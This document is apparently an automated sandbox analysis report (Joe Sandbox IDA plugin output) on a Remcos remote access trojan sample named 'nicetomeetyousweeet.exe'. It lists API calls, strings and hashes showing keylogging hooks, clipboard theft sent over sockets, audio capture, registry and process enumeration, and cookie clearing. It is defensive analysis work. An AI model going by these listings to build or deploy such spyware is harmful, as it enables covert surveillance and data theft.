                                                                                • Opcode ID: 5cb996c1ffb03084886c4e4072c3f1b63d42d5bcae1fa9276731ece7fbb20224
                                                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                • Opcode Fuzzy Hash: 5cb996c1ffb03084886c4e4072c3f1b63d42d5bcae1fa9276731ece7fbb20224
                                                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                • API String ID: 3286818993-703403762
                                                                                • Opcode ID: a97cffdb293a37a7a45951d73a64a7af970009917e936a30d46fd230753a6829
                                                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                • Opcode Fuzzy Hash: a97cffdb293a37a7a45951d73a64a7af970009917e936a30d46fd230753a6829
                                                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00789C68
                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00789C76
                                                                                • GetLastError.KERNEL32 ref: 00789C82
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00789CD2
                                                                                • TranslateMessage.USER32(?), ref: 00789CE1
                                                                                • DispatchMessageA.USER32(?), ref: 00789CEC
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 00789C99
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                • API String ID: 3219506041-952744263
                                                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                • Instruction ID: 0fd5a7b74a252ddcffe6bfacb8c2fe0f4dd1b1b418cdff25694102288bb37a35
                                                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                • Instruction Fuzzy Hash: 25110131644301AB8310BB7AAC0ED2B77ECEB94B22B10057EFD46C2251FA68D901C7A6
                                                                                APIs
                                                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                • API String ID: 4067487056-2527699604
                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                • __freea.LIBCMT ref: 00449B37
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • __freea.LIBCMT ref: 00449B40
                                                                                • __freea.LIBCMT ref: 00449B65
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3864826663-0
                                                                                • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                APIs
                                                                                • SendInput.USER32 ref: 00418B08
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend$Virtual
                                                                                • String ID:
                                                                                • API String ID: 1167301434-0
                                                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                • String ID:
                                                                                • API String ID: 2172192267-0
                                                                                • Opcode ID: c97dc0dc99a857ad5ebdb65bb4734d8e7e83005d9fb9f9527a25c03f25fe101b
                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                • Opcode Fuzzy Hash: c97dc0dc99a857ad5ebdb65bb4734d8e7e83005d9fb9f9527a25c03f25fe101b
                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 007D2E3D
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007D2EC0
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007D2F53
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007D2F6A
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007D2FE6
                                                                                • __freea.LIBCMT ref: 007D3011
                                                                                • __freea.LIBCMT ref: 007D301D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                • Opcode ID: c4a89f2486a78fdb2d2cd6a1d115c2a82ca2a719920f1ba833c456cc9ed525cb
                                                                                • Instruction ID: a54258fdf047dca8a4b85b55c722ba27ca8ddafb940c31bd7ef433f64bdbcaf1
                                                                                • Opcode Fuzzy Hash: c4a89f2486a78fdb2d2cd6a1d115c2a82ca2a719920f1ba833c456cc9ed525cb
                                                                                • Instruction Fuzzy Hash: 4591B471E002169ADF258F64CC45EEEBBB69F18714F18066AE801E7342E73DDD42C7A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: udp
                                                                                • API String ID: 0-4243565622
                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction ID: 41b753f7237144467f68922d8c692f43b43979dcb567498f7486d85ce90acd77
                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction Fuzzy Hash: 1771AA316083528FDF25CF18A49562BB7E4AF89345F14493EF885A7291D77CCE44CB92
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                APIs
                                                                                  • Part of subcall function 00790820: SetLastError.KERNEL32(0000000D,00790D9F,?,00000000), ref: 00790826
                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00790D7C), ref: 00790E2B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00790E91
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00790E98
                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00790FA6
                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00790D7C), ref: 00790FD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                                                • String ID: A
                                                                                • API String ID: 4001361727-520424720
                                                                                APIs
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • _free.LIBCMT ref: 00444086
                                                                                • _free.LIBCMT ref: 0044409D
                                                                                • _free.LIBCMT ref: 004440BC
                                                                                • _free.LIBCMT ref: 004440D7
                                                                                • _free.LIBCMT ref: 004440EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AllocateHeap
                                                                                • String ID: J7D
                                                                                • API String ID: 3033488037-1677391033
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007CAA9F,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007CA36C
                                                                                • __fassign.LIBCMT ref: 007CA3E7
                                                                                • __fassign.LIBCMT ref: 007CA402
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 007CA428
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,007CAA9F,00000000,?,?,?,?,?,?,?,?,?,007CAA9F,?), ref: 007CA447
                                                                                • WriteFile.KERNEL32(?,?,00000001,007CAA9F,00000000,?,?,?,?,?,?,?,?,?,007CAA9F,?), ref: 007CA480
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: RK}$RK}
                                                                                • API String ID: 269201875-816488649
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: TUFTUF$>G$DG$DG
                                                                                • API String ID: 3114080316-344394840
                                                                                APIs
                                                                                  • Part of subcall function 0079B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3D3
                                                                                  • Part of subcall function 0079B3C2: IsWow64Process.KERNEL32(00000000,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3DA
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0078E928
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0078E94C
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0078E95B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0078EB12
                                                                                  • Part of subcall function 0079B3EE: OpenProcess.KERNEL32(00000400,00000000), ref: 0079B403
                                                                                  • Part of subcall function 0079B3EE: IsWow64Process.KERNEL32(00000000,?), ref: 0079B40E
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0078EB03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                • String ID: PgF
                                                                                • API String ID: 2180151492-654241383
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 00442714
                                                                                • _free.LIBCMT ref: 004427DF
                                                                                • _free.LIBCMT ref: 004427E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: (7h$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$`=j
                                                                                • API String ID: 2506810119-3639734538
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00781D3A
                                                                                  • Part of subcall function 00781E4F: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00781EBB
                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00781DEC
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00781E2A
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00781E39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: `=G$x=G
                                                                                • API String ID: 3809562944-3004145341
                                                                                APIs
                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 1133728706-4073444585
                                                                                • Opcode ID: 5e97071d3d386628da5085207ae9cb3dc486694a073136f893461fd25a84c48e
                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                • Opcode Fuzzy Hash: 5e97071d3d386628da5085207ae9cb3dc486694a073136f893461fd25a84c48e
                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
